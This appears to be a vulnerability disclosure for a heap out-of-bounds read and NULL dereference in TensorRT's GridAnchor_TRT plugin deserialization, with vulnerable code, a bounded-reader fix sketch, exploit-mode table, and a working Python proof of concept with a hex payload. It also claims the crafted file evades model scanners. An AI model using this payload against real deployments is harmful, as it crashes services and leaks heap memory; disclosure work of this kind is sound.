
TensorRT GridAnchorPlugin — Heap Buffer Over-Read PoC

Format: TensorRT (.engine / .trt / .mytrtfile)
Affected component: plugin/gridAnchorPlugin/gridAnchorPlugin.cpp
Plugin name: GridAnchor_TRT (registered globally by initLibNvInferPlugins())
Trigger: deserializeCudaEngine() — at model load time, not inference
CWE: CWE-125 (Out-of-bounds Read), CWE-476 (NULL Pointer Dereference)


Vulnerability

In GridAnchorGenerator::GridAnchorGenerator(void const* data, size_t length, ...), the numAspectRatios field is read directly from attacker-controlled serialized plugin state with no bounds checking before the final PLUGIN_VALIDATE:

// gridAnchorPlugin.cpp (abridged)
mParam[id].numAspectRatios = read<int32_t>(d);          // attacker-controlled
mParam[id].aspectRatios
    = static_cast<float*>(malloc(sizeof(float) * mParam[id].numAspectRatios));
for (int32_t i = 0; i < mParam[id].numAspectRatios; ++i)
    mParam[id].aspectRatios[i] = read<float>(d);        // ← NO BOUNDS CHECK HERE
//  ^ walks arbitrarily far past the plugin state buffer into adjacent heap

PLUGIN_VALIDATE(d == a + length);                       // ← too late, already happened

The read<T>() template (from plugin/common/plugin.h) performs a raw memcpy with zero remaining-buffer tracking:

template <typename T>
T read(const char*& buffer) {
    T val;
    std::memcpy(&val, static_cast<void const*>(buffer), sizeof(T)); // no bounds check
    buffer += sizeof(T);
    return val;
}
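For contrast, a deserializer that tracks the remaining buffer rejects the payload before any over-read happens. The sketch below is illustrative Python, not TensorRT API; the class and method names are invented to show exactly the check that read<T>() lacks:

```python
import struct

class BoundedReader:
    """Reads typed values from a byte buffer, refusing to walk past its end."""

    def __init__(self, data: bytes):
        self.data = data
        self.offset = 0

    def read(self, fmt: str):
        size = struct.calcsize(fmt)
        if self.offset + size > len(self.data):  # the check read<T>() is missing
            raise ValueError("serialized plugin state truncated or count too large")
        (value,) = struct.unpack_from(fmt, self.data, self.offset)
        self.offset += size
        return value

# A count-prefixed float array like aspectRatios: every element read is bounded
reader = BoundedReader(struct.pack("<i2f", 2, 0.5, 1.0))
n = reader.read("<i")
ratios = [reader.read("<f") for _ in range(n)]  # an oversized n raises instead of over-reading
```

With this pattern, a payload claiming 0x7FFE aspect ratios fails on the first element read past the buffer, instead of walking into adjacent heap memory.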

Exploit Modes

Mode            Value                      Effect
OOB read        numAspectRatios = 0x7FFE   malloc(131,064 B) succeeds; loop reads ~131 KB past state end
NULL deref      numAspectRatios = -1       malloc(~16 GB) → NULL; write through NULL → SIGSEGV
mNumPriors OOB  mNumPriors = 0x7FFFFFFF    deserializeToDevice() copies 8 GB from heap to GPU
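The allocation sizes above follow from sizeof(float) == 4. A quick sanity check of the arithmetic (treating -1 as truncated to an unsigned 32-bit value first is an assumption, but it is the interpretation consistent with the ~16 GB figure):

```python
SIZEOF_FLOAT = 4  # assumed sizeof(float) on the target platform

# OOB read mode: numAspectRatios = 0x7FFE
print(0x7FFE * SIZEOF_FLOAT)                     # 131064 bytes -> malloc succeeds

# NULL-deref mode: -1 reinterpreted as unsigned 32-bit before the multiply
print((-1 & 0xFFFFFFFF) * SIZEOF_FLOAT / 2**30)  # ~16 GiB -> malloc returns NULL

# mNumPriors mode: 0x7FFFFFFF float elements copied to the GPU
print(0x7FFFFFFF * SIZEOF_FLOAT / 2**30)         # ~8 GiB host-to-device copy
```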

Reproduce

import pycuda.autoinit
import tensorrt as trt

logger = trt.Logger(trt.Logger.ERROR)
trt.init_libnvinfer_plugins(logger, "")
creator = trt.get_plugin_registry().get_plugin_creator("GridAnchor_TRT", "1", "")

# OOB read: numAspectRatios = 0x7FFE
payload = bytes.fromhex("01000000295c8f3d9a99193efe7f00004000000040000000cdcccc3dcdcccc3dcdcccc3dcdcccc3d08000000cdcccc3dcdcccc3dcdcccc3dcdcccc3dcdcccc3dcdcccc3dcdcccc3dcdcccc3dcdcccc3dcdcccc3dcdcccc3dcdcccc3dcdcccc3dcdcccc3dcdcccc3dcdcccc3d")
result = creator.deserialize_plugin("GridAnchor_TRT", payload)
# → None (exception caught) or SIGSEGV
# → CWE-125 confirmed
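The oversized count can be located inside the hex payload by decoding its leading bytes. The field names below are inferred from TensorRT's GridAnchorParameters struct and from the byte values themselves; the authoritative layout is whatever the plugin serializes in gridAnchorPlugin.cpp:

```python
import struct

# First 16 bytes of the payload used in the PoC above
head = bytes.fromhex("01000000295c8f3d9a99193efe7f0000")

# Plausibly: a layer count, two float scales, then numAspectRatios (assumed names)
first, min_size, max_size, num_aspect_ratios = struct.unpack("<i2fi", head)
print(first)                   # 1
print(round(min_size, 2))      # 0.07
print(round(max_size, 2))      # 0.15
print(hex(num_aspect_ratios))  # 0x7ffe -> the count driving the over-read
```

The int32 at byte offset 12 is 0x7FFE, so the deserializer will attempt to read 131,064 bytes of aspect ratios from a payload only ~100 bytes long.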

Or run poc_trigger.py directly:

pip install tensorrt pycuda
python3 poc_trigger.py

Files

File                       Description
poc_trigger.py             Standalone Python PoC — runs on any TRT-enabled machine
malicious_oob_state.bin    Raw plugin state: numAspectRatios=0x7FFE (OOB read)
malicious_null_state.bin   Raw plugin state: numAspectRatios=-1 (NULL deref)

Impact

  • Any application calling deserializeCudaEngine() on an untrusted .engine file is vulnerable β€” no special configuration required
  • GridAnchor_TRT is registered automatically by initLibNvInferPlugins(), which is called by virtually every TRT-based deployment framework
  • Scanner bypass: protectai/model-scanner and similar tools do not inspect plugin state field values, so this file passes all existing scans
  • No inference required: crash occurs at load time